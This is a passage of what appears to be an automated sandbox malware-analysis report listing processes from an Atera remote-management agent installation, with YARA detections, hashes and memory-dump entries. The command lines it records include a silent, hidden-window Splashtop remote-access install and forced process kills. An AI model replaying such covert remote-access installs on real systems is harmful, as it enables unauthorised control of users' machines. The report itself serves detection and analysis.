                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2935401771.0000016BD0D10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:26
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c5700000
                                                                                                                                                                                                                                                                                                                                  File size:72'192 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:26
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:27
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "e24a5d52-0d16-40c8-ae18-af372363c3dc" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000LlkxmIAB
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x2e94e950000
                                                                                                                                                                                                                                                                                                                                  File size:177'712 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2179995487.000002E94EAA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2184094049.000002E94F68C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2179995487.000002E94EADB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2184094049.000002E94F651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2181419382.000002E94ED90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2184094049.000002E94F523000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2184094049.000002E94F64C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2184094049.000002E94F491000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2184094049.000002E94F6BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001B.00000002.2184094049.000002E94F72A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Has exited:true

Target ID: 28
Start time: 18:30:27
Start date: 30/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 18:30:28
Start date: 30/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
Imagebase: 0x7ff78e390000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2089827549.000002332A61B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000003.1992596648.000002332A8C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2089827549.000002332A633000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2089827549.000002332A610000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2090008634.000002332A8A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited: true

Target ID: 30
Start time: 18:30:28
Start date: 30/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 31
Start time: 18:30:28
Start date: 30/10/2024
Path: C:\Windows\System32\cscript.exe
Wow64 process (32bit): false
Commandline: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
Imagebase: 0x7ff7666d0000
File size: 161'280 bytes
MD5 hash: 24590BF74BBBBFD7D7AC070F4E3C44FD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000002.2086909400.0000022D4CA70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited: true

Target ID: 32
Start time: 18:30:29
Start date: 30/10/2024
Path: C:\Windows\System32\sppsvc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sppsvc.exe
Imagebase: 0x7ff6141d0000
File size: 4'630'384 bytes
MD5 hash: 320823F03672CEB82CC3A169989ABD12
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

                                                                                                                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:30
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "c7045ac8-f19b-40af-bcd9-2d8df64c2185" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000LlkxmIAB
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x21719510000
                                                                                                                                                                                                                                                                                                                                  File size:74'288 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:749C51599FBF82422791E0DF1C1E841C
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:30
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:39
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k smphost
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:48
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                  File size:56'378'536 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:F1356F7FBD37502B529D9BCD643FB7AB
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000024.00000002.2614681807.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000024.00000002.2618143412.0000000000620000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:37
Start time:18:30:51
Start date:30/10/2024
Path:C:\Windows\Temp\unpack\PreVerCheck.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\Temp\unpack\PreVerCheck.exe" /s /i sec_opt=0,confirm_d=0,hidewindow=1
Imagebase:0xbb0000
File size:2'792'968 bytes
MD5 hash:DF5EB1AF99091A902EFFA52463EDA084
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:18:30:51
Start date:30/10/2024
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:msiexec /norestart /i "setup.msi" /qn /l*v "C:\Windows\TEMP\PreVer.log.txt" CA_EXTPATH=1 USERINFO="sec_opt=0,confirm_d=0,hidewindow=1"
Imagebase:0x4e0000
File size:59'904 bytes
MD5 hash:9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:18:30:52
Start date:30/10/2024
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 556B5128AD7072E16BEB10DB90B1A40C E Global\MSI0000
Imagebase:0x4e0000
File size:59'904 bytes
MD5 hash:9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:18:30:54
Start date:30/10/2024
Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
Wow64 process (32bit):false
Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{E00D6CF4-4FC3-431C-B643-8FF5D1691F3C}
Imagebase:0x7ff6279d0000
File size:183'856 bytes
MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:18:30:54
Start date:30/10/2024
Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
Wow64 process (32bit):false
Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{92D3031C-81C4-4FED-8F50-F5E3BE9F3612}
Imagebase:0x7ff6279d0000
File size:183'856 bytes
MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:18:30:55
Start date:30/10/2024
Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
Wow64 process (32bit):false
Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4C499929-14EA-4E52-BDA5-131742626400}
Imagebase:0x7ff6279d0000
File size:183'856 bytes
MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:18:30:55
Start date:30/10/2024
Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
Wow64 process (32bit):false
Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{6385CD88-DCB3-4881-A482-8EE7F96DDDE3}
Imagebase:0x7ff6279d0000
File size:183'856 bytes
MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:18:30:55
Start date:30/10/2024
Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
Wow64 process (32bit):false
Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{8ABF8E23-F9FD-49C3-8B2D-36EBD8434563}
Imagebase:0x7ff6279d0000
File size:183'856 bytes
MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

Target ID:45
Start time:18:30:55
Start date:30/10/2024
Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
Wow64 process (32bit):false
Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4103781B-B841-4FC0-AA1E-5FD5FA8D8AE8}
Imagebase:0x7ff6279d0000
File size:183'856 bytes
MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:46
Start time:18:30:55
Start date:30/10/2024
Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
Wow64 process (32bit):false
Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{FB3E51D0-455D-47D0-B21A-C3DC48DCD266}
Imagebase:0x7ff6279d0000
File size:183'856 bytes
MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:47
Start time:18:30:55
Start date:30/10/2024
Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
Wow64 process (32bit):false
Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{AA5AA93B-7BA4-4056-819A-23A48FF3891F}
Imagebase:0x7ff6279d0000
File size:183'856 bytes
MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:48
Start time:18:30:55
Start date:30/10/2024
Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
Wow64 process (32bit):false
Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{035C7190-A369-4041-A248-C0E4DB43C54F}
Imagebase:0x7ff6279d0000
File size:183'856 bytes
MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:49
Start time:18:30:55
Start date:30/10/2024
Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
Wow64 process (32bit):false
Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{B627E9BE-EB25-4498-B44A-CDE0D79185EC}
Imagebase:0x7ff6279d0000
File size:183'856 bytes
MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:50
Start time:18:30:56
Start date:30/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRServer.exe /T"
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:51
Start time:18:30:56
Start date:30/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:56
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:taskkill.exe /F /IM SRServer.exe /T
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x670000
                                                                                                                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:56
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRApp.exe /T"
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:56
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  Target ID:381
                                                                                                                                                                                                                                                                                                                                  Start time:18:31:45
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                                  Reset < >
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: $kq$$kq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3550614674
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c9206b676734bcfd894e622e1452d593488f76a4f7def5f2cf94c8b6420b2b4d
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 45f454c15066cbd32ea981b742899415f691a23cbb8ec82f9d80a1bb5b632af6
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9206b676734bcfd894e622e1452d593488f76a4f7def5f2cf94c8b6420b2b4d
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A251BE31B10209DFCB55DF79DC506AEBBFAFF89250B25812AE918D7364DA309D01CBA0
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9ad3965d35f38f9e6de05c0213210afa01e3a8fdc48cfa2f35ed6c260dd25618
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6dadbf845094f4bc84a26c6f4a254077e9a4c4266812a67466fa2ab9801824a1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ad3965d35f38f9e6de05c0213210afa01e3a8fdc48cfa2f35ed6c260dd25618
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D371B635B10214DFDB549FB9CC54AAE7AE7EFC8200F158429E606EB3A4DE71DC428791
                                                                                                                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
Joe Sandbox IDA Plugin
